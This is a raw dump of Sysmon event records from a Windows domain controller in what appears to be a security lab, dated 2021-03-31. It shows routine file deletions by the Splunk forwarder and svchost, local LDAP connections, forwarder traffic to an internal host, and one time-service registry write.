Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F73CE7679518FC7A62502232EB32DA6,SHA256=6C1E68034CBE6E50EF0978D8A6FC94AE20A96CC19693CCE8D7D4319A66BDD820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:15.089{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DD1166FE468EE58C9CB78FF0F745D9,SHA256=ED6ADBF42CC90F5E6746A3B7128D2486608C5D2B1D576E8224782662FBAC5079,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:15.508{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53684-false10.0.1.12-8000- 23542300x800000000000000010288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:16.152{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E9CD8DD88C59AB25C0852E1611CA9A3,SHA256=1297718CBD76A0536F8EBBA1A2A0FEFFE42BC46B1C574DD5A850BD24D2B38427,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:14.524{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53683-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:14.524{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53683-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000010290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:17.245{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D9AD1FA23E7E04D9EF3100A0154D3A,SHA256=1DB1894496A90595FF463770A8514324F4943BECCFD35CEED1CFC443119ED276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\28A6.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_14.rslcMD5=8F550E873FBDC1B03BF74C696D92CDB9,SHA256=A23E1C824110FAE64400BB8F553B478ECB19295E4B09708A612E05048DC12696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\28A5.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.448{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_12.rslcMD5=E81C6E8D4B738BC8724E05F4065353CE,SHA256=349F526B5C422BE4E0B3CD07F7BDF03935B0FDC8C02064C6843A32B3BCFABBF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2894.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_13.rslcMD5=C083A118F5365BF1604AB51272849432,SHA256=78D85BA7F94AC696CA1A27237AF7D9F1E826A8D48756E97A393630FE1C7A540A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2893.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_10.rslcMD5=EFFC38495D7BB371926D3100A728810F,SHA256=7B935BCCFB869295A1C343BAFFF9D7A18464E922EFE89A4B658443370050A852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2892.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_11.rslcMD5=1F9D1399A60C309143DA8DBA5FCA78B7,SHA256=241205C9A2E659306DF7DE260C0C6630DA6EEB80014F3C5BBF527F3EF249D2C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2891.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.432{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_9.rslcMD5=14B4ADE4BB1D0C5143CA4A4708E77197,SHA256=EA588F603FF7D17EA1BEDEA528A3A0252A261DC62666F9DB848488B99BAF5189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2881.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_6.rslcMD5=85692122DD1334A73E55EFFACCF5E3DF,SHA256=A5CC11617FD6644D87E73D8BC6015A62A4163FB8A28E4AC1FE5824EFDB4535DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\2880.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_8.rslcMD5=B78B77A1B75A721643C0FD83C10C542A,SHA256=2FEB23DB338783C72A67125CB113AA817078BCE7C669AFF72D83EBF72B1BFD19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\287F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_7.rslcMD5=471CD78DADC5E71F87AE1F2D5F22CF4A,SHA256=FA939CBB340434F83096D7E83ED759187070235ED922BED09FD45215FEBF705D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\287E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.417{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_5.rslcMD5=79F5AEC887844E88BC3F3B0418C3DCBC,SHA256=7305F078EF415935753DB343C0F91C1FDBDCE5B66E3179B89AFB5785C8243056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_4.rslcMD5=9FE2C1D66F9BC7125314AE1A941451F5,SHA256=C06ADF1F7DE4439C1C5CD8FFDCD414FFE30E87EDF4A2795D2BA3C84B04CDAA08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_3.rslcMD5=E8625F0AE477D2338F90CCD3DE095138,SHA256=9481376CEB762C07B7D87DDDD88EBF22467908E2F157386F8C8ED0CB28C3B4EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286B.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_2.rslcMD5=24DE2425A7FBFE83CAE353BF3DF8A32A,SHA256=E2E35CA12A42879A1585AF05720CAD8E6182E14BE7E1B5A05FEE1D4B86BDEAF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\286A.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.401{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\AppRepository\d4ec2279-a0c2-4422-82e8-34cc65d9a664_S-1-5-21-4055678433-3894535204-3898404691-500_1.rslcMD5=C9D8E740E1A8CF089BE3FD49431F9D25,SHA256=C74D0E126D0F0B0AC540F606996CC707301586A6BCD1F8E30BAC541FF7D015D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:18.338{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=781A977F985F54EAA536F22CE1C339E3,SHA256=44E47443CD3D60BFFB45043329539F7A0DB67388C961111C363EC948B8C6410D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:19.510{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DE3728E21641F89EAFB923C98EB3539,SHA256=805A7A961033418664F340EC510915F35C4B9F59DBB34056E803E62D8758C5FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:19.510{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C7473592ABE08110688B66C5673E6FE5,SHA256=7693F93F526BBA7A83C694299B80E718F80C9D594B6E7F2F9E333ACC1262F1CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:19.354{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4AA945367E616B1E9B73A99261EB137,SHA256=D9FAE96D97FE6572E34DD7FDEFE65636132EB9A59B173A7A01ED31121B7C2F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:20.494{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=794A772EF6A23239AD03E112765EB19D,SHA256=11B08B48C2EADCA3377B4AD04D991434188F8AB6144B1C97F3F1E9311AFE5EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:21.556{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44847EA18A4173551F7543C5EA4EE558,SHA256=19F1798413864ED7F8FDA2C30FB73A8C90A059AE054D91FC6134A31B40073D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:22.587{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A00C6D67C48C09D579FEBD517ED9311,SHA256=4977DCA1CA8DEB2CF78AA87E834E54AE24D768DD431C4B97FF692BE71D83BF19,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:20.649{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53685-false10.0.1.12-8000- 23542300x800000000000000010327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:23.618{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB54DEDF1E925624775D491E9C05B21,SHA256=B762CF2730C467347338AC3302268B2DE1BAB5865D9BA24E15576256E074657A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:24.681{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8008E9DFA6D4F295E20648730EC70448,SHA256=451511B5517B85966441BCE12C17E712446BAECF238C01C237A194619DDCF957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:24.681{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9ABA44B509432CEEFFCB63A1383EB3B5,SHA256=230CED6D81127327E0BA58B515CAE30F01A88FEA3FEFCD82258F82AF8CFC93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:24.634{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C32961E4CE53AF211FCBD56FA6422E,SHA256=101AEEB2154965C3E11F8BAEF0CADFFD679C36254F3FEB903810A31A7440FAC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:25.665{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=551D0B7B21399E4D37D1C3BF5F878951,SHA256=424222B9E1B3090D2E4848639B38BC272B0B761F9D06CF5F147236D95C7D9E90,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:25.009{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x696d2715) 23542300x800000000000000010333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:26.743{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6700506F41F0B0ADA0BFE18675B58FA,SHA256=8D0530FF79154ECA5D7529B6ED9C8A5CC8D9C98A6C63CB0B1D161BC898C32E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:27.805{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39EC414AC8A95B798E21EC79F5A114C1,SHA256=BE10FE079941BA4A17D5DD82DC6512362C2E38BB06F02BC3B30A8DBA806D5C97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:28.851{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1356767F8AF1661BB14285341420072,SHA256=C3973585E96900B6726A0A95ABD5F1A087F02EBBFA0EB11C4CB91F2C4DD235C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:26.586{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53686-false10.0.1.12-8000- 23542300x800000000000000010337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:29.929{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7F93726A25560BD0C65065765FBBC9,SHA256=7673D2D84EE1BF2BED724905A92E8333EABA999E0A191EBE9CCD66870AF5FE29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:30.976{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0BCA9509F110A25B6BD1E61B94E733,SHA256=92B64118EADDEE336EA4050ADBFA7B2B4D5FE61D0411133670B8EF26C0FB3B41,IMPHASH=00000000000000000000000000000000falsetrue 